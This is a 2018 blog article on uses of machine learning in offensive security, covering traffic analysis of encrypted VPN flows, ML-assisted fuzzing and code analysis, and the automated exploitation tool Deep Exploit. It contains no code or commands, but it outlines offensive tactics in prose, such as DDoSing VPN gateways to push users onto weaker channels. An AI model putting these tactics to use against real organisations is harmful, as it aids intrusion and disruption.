Penetration testing

Machine Learning in Offensive Security

David Balaban
August 24, 2018 by
David Balaban

Contrary to popular belief, machine learning is not an invention of the 21st century. Over the last twenty years, however, several productive hardware platforms have appeared, and now neural networks and other machine-learning models can be used to help us with everyday needs. According to CB Insights, almost 90 start-ups (two of them with an estimated worth of over one billion US dollars) are trying to automate or partially-automate routine and monotonous tasks.

Part of the sudden attraction of machine learning is that it's connected with artificial intelligence. That can be a problem: artificial intelligence in security now has too much hype and marketing noise. The phrase "artificial intelligence" attracts investors. People start calling even the simplest correlation of events AI, and buyers of ready-made solutions do not get what they hoped for (even if these expectations were initially too high).

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

But it's important to remember that machine learning is not entirely the same as artificial intelligence. Artificial intelligence refers to the broader concept of machines being intelligent and able to think, while machine learning is a subset and current application of that idea. In machine learning, a computer system is given the chance to "learn" from sample inputs, distinguishing X from Y or predicting future outcomes based on past data. Over time, a machine can, essentially, be trained to recognize and carry out certain functions.

There are a dozen areas in which machine learning is used. But machine learning has not yet become a "magic pill" of cybersecurity due to several serious limitations.

The first limitation is the narrow applicability of each particular model's function. A neural network can only do one thing well. If it recognizes images well, then the same network will not be able to recognize audio. It is the same with the infosec: if the model was trained to classify events from network sensors and detect computer attacks on network equipment, then it probably won't be able to work with mobile devices. But If the customer is a fan of AI, he will buy, buy and buy.

The second limitation is the lack of learning data. Most solutions are built on pre-existing data sets, but not on your own corporate datasets.

The third and, probably, the main thing: machine-learning products cannot be forced to answer for their decisions. Even the developer of the "Unique Means of Protection with Artificial Intelligence" can respond to complaints with: "Well, what do you want? The neural network is a black box! No one can 100% be sure why it decided this way and not another." Therefore, information security incidents still have to be confirmed by people. Machines help, but people still carry the responsibility.

There are a lot of problems with the protection of information. Perhaps these problems will be resolved sooner or later. But what about attacks? Can ML and AI become part of the fight against cyberattacks?

 

The Variants of Machine Learning Uses

 

It's currently most reasonable to use ML in the following areas:

  • Where it is necessary to create something similar to what the neural network has already encountered
  • Where it is necessary to reveal patterns that are not obvious to a human being

ML solutions are already doing very well in these areas. But besides this, some tasks can be accelerated. For example, some experts have already written about the automation of attacks using Python and Metasploit. (See Sources.)

 

Attacking Cryptosystems

 

Suppose that victim built his own virtual private network or utilizes some of the best VPN services out there, and all traffic is encrypted. Suppose we can listen to the encrypted traffic of the attacked organization, but we would like to know what exactly is in this traffic.

The idea behind this was presented by Cisco in their article "Detecting Encrypted Malware Traffic (Without Decryption)." After all, if we can determine the presence of malicious objects based on data from NetFlow, TLS and DNS data, what prevents us from using the same data to identify communications between employees of the attacked organization or between employees and corporate IT services?

It is important to note that when using an AI in these instances, profiles on these communications lines can be built. The AI system will then literally learn from this and model potential future communications. From this point onwards, various triggers and alerts could be implemented to warn of any type or kind of looming cyberattack.

It is very expensive to attack cryptosystems. Therefore, using information about the addresses and ports of the source and the receiver, the number of packets transmitted and their size and timestamps, we can try to understand the encrypted traffic without launching a full attack.

Further, by defining VPN crypto-gateways or end nodes in case of p2p communications, we start to DDoS them, forcing users to switch to less-secure methods of communication which may be easier to attack.

 

Looking for Bugs and Software Vulnerabilities

 

Perhaps the most famous attempt to automate these search, exploitation and vulnerability fixes was 2016's DARPA Cyber Grand Challenge. Seven fully-automatic defense systems designed by different teams struggled in the final CTF-like battle.

Of course, the goal was noble: to find the best system to protect the infrastructure, IoT and applications in real-time and with minimal need for human participation. But you can look at the results from a different angle. An AI system of this kind could easily be modified to exploit vulnerabilities instead of protecting them.

There are other methods known for semi-automated vulnerability detection. The first direction here is to automate the fuzzing, or input of random, invalid data to detect potential errors and vulnerabilities. Members of the CGC widely used a fuzzer called "american fuzzy lop." Wherever there is a lot of structured and semi-structured data, the ML models can easily find similar patterns. If the attempt to "bring down" the application has worked with some input data, it is likely that this approach will work somewhere else.

The same works with static code analysis and dynamic analysis of executable files when the source code of the application is not available. Neural networks can search not just pieces of code with vulnerabilities, but code that looks like the vulnerable pieces. Fortunately, there are a lot of places to look for code with confirmed (and fixed) vulnerabilities. The researcher will just have to verify these suspicions. With each newfound bug, such a neural network will become smarter. Thanks to this approach, you can avoid using only pre-written signatures.

In a dynamic analysis, if the neural network can understand the relationship between input data (including user data), execution order, system calls, memory allocation and confirmed vulnerabilities, it will eventually be able to search for new ones.

 

Automating the Process of Exploitation

 

With the tool Deep Exploit, this approach can work in two modes: data collection mode and brute-force mode.

In the first mode, Deep Exploit identifies all open ports on the attacked node and launches exploits that previously worked for such a combination.

In the second mode, the attacker specifies the product name and port number, and Deep Exploit launches "carpet bombing" using all available combinations of exploits, payloads and targets.

Deep Exploit can independently learn the methods of exploitation, using training with reinforcement (based on the feedback that Deep Exploit receives from the system being attacked).

The use of AI, especially that of neural networks, can help in two specific areas. These are as follows:

 

The Vulnerability Discovery

 

AI tools can do a much better job modeling newer threat profiles, because they have already been trained in previous datasets. For example, they "can suggest new payloads to discover new issues with better probability." (Forbes.)

 

Exploitation

 

This is the phase where the cyberattacker takes the vulnerability they have entered into and tries to capitalize on those weaknesses to cause further damage and/or capture more sensitive information and data. The use of AI can help in this regard, because it can model and predict scenarios of potential exploits that a cyberattacker can use much quicker than a human being possibly could, and of course with higher degree of statistical accuracy.

 

Conclusion: Can AI Replace Pentest Teams?

 

Probably not yet. Machines have problems building logical chains of exploitation using known vulnerabilities, and this often directly affects the achievement of the purpose of penetration testing. The machine can find vulnerability, it can even create an exploit on its own, but it cannot assess the degree of influence of this vulnerability on a specific information system or business processes of the organization as a whole.

The work of automated systems generates a lot of noise on the system being attacked, which is easily detected by means of protection. Machines work clumsily. Social engineering may help reduce this noise and get an idea of the system, but machines are also not very good at social engineering.

And the machines do not have wit and intuition or presentiment. For example, there was a project in which the most cost-effective way of testing would be to use a radio-controlled model.

 

Sources

 

Cybersecurity's Next Frontier: 80+ Companies Using Artificial Intelligence To Secure The Future In One Infographic, Research Briefs

Automating the actions of the attacker using metasploit and Python, Scan For Security

Detecting Encrypted Malware Traffic (Without Decryption), Cisco Blogs

How AI Can Be Applied to Cyberattacks, Forbes

FREE role-guided training plans

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

Remove Mac Auto Fixer virus, MacSecurity

David Balaban
David Balaban